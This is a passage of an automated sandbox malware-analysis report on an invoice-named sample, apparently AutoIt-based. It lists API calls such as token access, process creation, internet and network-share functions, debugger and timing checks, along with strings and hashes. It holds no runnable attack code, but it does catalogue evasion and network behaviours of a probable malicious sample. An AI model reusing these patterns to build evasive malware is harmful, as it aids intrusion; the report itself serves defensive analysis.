                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Similarity
                                                                            • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 2621361867-0
                                                                            APIs
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37896,?,?,00000000), ref: 00ED5A2C
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37896,?,?,00000000,?,?), ref: 00ED5A50
                                                                            • gethostbyname.WS2_32(?), ref: 00F46399
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F463A4
                                                                            • _memmove.LIBCMT ref: 00F463D1
                                                                            • inet_ntoa.WS2_32(?), ref: 00F463DC
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 1504782959-0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F28B61
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F28B73
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F28B89
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F28BA4
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F2FCED,?,00F30D40,?,00008000), ref: 00F3115F
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F2FCED,?,00F30D40,?,00008000), ref: 00F31184
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F2FCED,?,00F30D40,?,00008000), ref: 00F3118E
                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00F2FCED,?,00F30D40,?,00008000), ref: 00F311C1
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F2D84D
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F2D864
                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F2D879
                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F2D897
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00F5B2E4
                                                                            • ScreenToClient.USER32(?,?), ref: 00F5B2FC
                                                                            • ScreenToClient.USER32(?,?), ref: 00F5B320
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F5B33B
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F5B644
                                                                            • _memset.LIBCMT ref: 00F5B653
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F96F20,00F96F64), ref: 00F5B682
                                                                            • CloseHandle.KERNEL32 ref: 00F5B694
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3277943733-0
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00F36BE6
                                                                              • Part of subcall function 00F376C4: _memset.LIBCMT ref: 00F376F9
                                                                            • _memmove.LIBCMT ref: 00F36C09
                                                                            • _memset.LIBCMT ref: 00F36C16
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00F36C26
                                                                            Similarity
                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                            • String ID:
                                                                            • API String ID: 48991266-0
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 00ED2231
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00ED223B
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00ED2250
                                                                            • GetStockObject.GDI32(00000005), ref: 00ED2258
                                                                            • GetWindowDC.USER32(?,00000000), ref: 00F0BE83
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F0BE90
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00F0BEA9
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00F0BEC2
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00F0BEE2
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00F0BEED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 1946975507-0
                                                                            • Opcode ID: 26cd0e47627f4b17420251d0682d37d9bc8a88ea20a9089868cb60853692ec92
                                                                            • Instruction ID: 308e8d658dc158c70e1a8aa67e5debec6aac0c74183f8b9ed35c172987a37194
                                                                            • Opcode Fuzzy Hash: 26cd0e47627f4b17420251d0682d37d9bc8a88ea20a9089868cb60853692ec92
                                                                            • Instruction Fuzzy Hash: 9CE03932504648AADB215FA4EC0DBD83B10EB15337F0483A6FB69980E187714985EB12
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 00F2871B
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F282E6), ref: 00F28722
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F282E6), ref: 00F2872F
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F282E6), ref: 00F28736
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 03851334d0fdcfaaf6ebeea01b742ab1c0c44a8225d8361eeb382a6881472675
                                                                            • Instruction ID: 639555a36e87f7d330a0f18960ce862789fb5329964efce95567230bfaaa98ef
                                                                            • Opcode Fuzzy Hash: 03851334d0fdcfaaf6ebeea01b742ab1c0c44a8225d8361eeb382a6881472675
                                                                            • Instruction Fuzzy Hash: E5E08676A123259BD7605FB06D0CB573BBCEF607E3F144868B345CA0C0DA34844AE750
                                                                            APIs
                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00F2B4BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ContainedObject
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3565006973-3941886329
                                                                            • Opcode ID: 0e382bd3a9b41fd54671293af173263da8c497ce25b309ebeab4e5529407c207
                                                                            • Instruction ID: 3729d1491d6276d10304f7ba77581d75c0f9889071e54ba65fd9ca4aea2687f8
                                                                            • Opcode Fuzzy Hash: 0e382bd3a9b41fd54671293af173263da8c497ce25b309ebeab4e5529407c207
                                                                            • Instruction Fuzzy Hash: 0D916771600611AFDB14DF64D885B6ABBE9FF48710F24856DED0ACF2A2DB70E841DB50
                                                                            APIs
                                                                              • Part of subcall function 00EEFC86: _wcscpy.LIBCMT ref: 00EEFCA9
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • __wcsnicmp.LIBCMT ref: 00F3B02D
                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F3B0F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                            • String ID: LPT
                                                                            • API String ID: 3222508074-1350329615
                                                                            • Opcode ID: 765b4cf23bc15b177158a0a1a381f7beca90436597e00fc49930167f50612d22
                                                                            • Instruction ID: e12993cd890b8f578abb79a956b041e2bad07b8e4af3909ad82c2bf0436ea8cc
                                                                            • Opcode Fuzzy Hash: 765b4cf23bc15b177158a0a1a381f7beca90436597e00fc49930167f50612d22
                                                                            • Instruction Fuzzy Hash: 84617576E00219AFCB18EF94C861EAEB7F4EF08720F15405AFA16AB351D770AE45DB50
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 00EE2968
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00EE2981
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: cca05cee1cc02c096858460729e95ee3a7ae6e44f544e60ec642de37de34ca9b
                                                                            • Instruction ID: 69df759636cb73ab499763e505d5a49703ffa5e2eb82217886d48ec4e07506d2
                                                                            • Opcode Fuzzy Hash: cca05cee1cc02c096858460729e95ee3a7ae6e44f544e60ec642de37de34ca9b
                                                                            • Instruction Fuzzy Hash: 3C5136714087489BD320AF10DC86BAFBBF8FB85344F41885EF2D8511A2DB319569DB67
                                                                            APIs
                                                                              • Part of subcall function 00ED4F0B: __fread_nolock.LIBCMT ref: 00ED4F29
                                                                            • _wcscmp.LIBCMT ref: 00F39824
                                                                            • _wcscmp.LIBCMT ref: 00F39837
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            • Opcode ID: a6c385a4dd274e8a840e3be214b7afa49aceffb6e8ecb8e0eba35bd0ee5d5e60
                                                                            • Instruction ID: 978b6937917405befc573f091a469fba8e53db46b550f8dd79806d6a39bdfd2d
                                                                            • Opcode Fuzzy Hash: a6c385a4dd274e8a840e3be214b7afa49aceffb6e8ecb8e0eba35bd0ee5d5e60
                                                                            • Instruction Fuzzy Hash: BB41B671A04209BBDF21ABA0CC45FEFBBFDDF85720F40046AF904B7291DAB199059B61
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F4259E
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F425D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |
                                                                            • API String ID: 1413715105-2343686810
                                                                            • Opcode ID: 0e181c98762bc3d816b1c295ea555e3f6d264f043703704bb299f202383527f2
                                                                            • Instruction ID: e0d88f2ce3295bc0d101b4d9ec2e3af6976ea743634f99c65a6677ba0edd9bb1
                                                                            • Opcode Fuzzy Hash: 0e181c98762bc3d816b1c295ea555e3f6d264f043703704bb299f202383527f2
                                                                            • Instruction Fuzzy Hash: 95310371801219AFCF01AFA4CC85EEEBFB8FF08350F10106AFD14B6262EA315956DB60
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F57B61
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F57B76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 46a0b6e2bc1fa9f65a44b67de2e3313294e73154cf8fe71773d68b71bd47199d
                                                                            • Instruction ID: af3c045c93ae468acefb5b85dd6b909ddb3981ca73f505e12c9d38986b060114
                                                                            • Opcode Fuzzy Hash: 46a0b6e2bc1fa9f65a44b67de2e3313294e73154cf8fe71773d68b71bd47199d
                                                                            • Instruction Fuzzy Hash: 1A412875A04309AFDB14DF65D880BDABBB5FB08301F10016AEE04EB395D730AA45DF90
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00F56B17
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F56B53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: f336a5504d4cca610695556752b95167d1dbc621c7f5b8a385761037b32b0083
                                                                            • Instruction ID: 8d74c29df0208956c7c14c5568b71b8dbfe79210150bc41b92434889a725f3d9
                                                                            • Opcode Fuzzy Hash: f336a5504d4cca610695556752b95167d1dbc621c7f5b8a385761037b32b0083
                                                                            • Instruction Fuzzy Hash: 1E31B071200608AEDB109F64CC40BFB77A9FF88721F509519FEA5D3190DA34AC86EB60
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F32911
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F3294C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
APIs
• __snwprintf.LIBCMT ref: 00F43A66
  • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
Strings
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F56761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F5676C
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00ED1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ED1D73
  • Part of subcall function 00ED1D35: GetStockObject.GDI32(00000011), ref: 00ED1D87
  • Part of subcall function 00ED1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED1D91
• GetWindowRect.USER32(00000000,?), ref: 00F56C71
• GetSysColor.USER32(00000012), ref: 00F56C8B
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00F569A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F569B1
Strings
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• _memset.LIBCMT ref: 00F32A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F32A41
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F4222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F42255
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
  • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F28E73
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
  • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00F28D6B
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
  • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00F28DEE
Strings
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 87bd335fc65565ae83de3d285f99036fe4ba5dc08a1672647bd17b362d30ca5e
                                                                            • Instruction ID: 6b8eee1a069889c22913eaad7ae193001e28491728c392251ee61958590a2508
                                                                            • Opcode Fuzzy Hash: 87bd335fc65565ae83de3d285f99036fe4ba5dc08a1672647bd17b362d30ca5e
                                                                            • Instruction Fuzzy Hash: 0A01F772A41219A7CB10F7A4D952EFE73A8DF11350F600016B841B3292DE258E0EF671
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: 5a4b16c3be12fefbcbcba14b1bd8cae8b5dd32145ed5217580f38035a7202c49
• Instruction ID: 70bc777687418f2c341239d39157dafa31d90e865a4f117ccdbfd3b2655d00bb
• Opcode Fuzzy Hash: 5a4b16c3be12fefbcbcba14b1bd8cae8b5dd32145ed5217580f38035a7202c49
• Instruction Fuzzy Hash: CDE09232A0022C2AD720ABA9EC49AA7F7ACEB85B71F050067FD04D7051D960AA4587E1
APIs
  • Part of subcall function 00F0B314: _memset.LIBCMT ref: 00F0B321
  • Part of subcall function 00EF0940: InitializeCriticalSectionAndSpinCount.KERNEL32(00F94158,00000000,00F94144,00F0B2F0,?,?,?,00ED100A), ref: 00EF0945
• IsDebuggerPresent.KERNEL32(?,?,?,00ED100A), ref: 00F0B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00ED100A), ref: 00F0B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F0B2FE
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
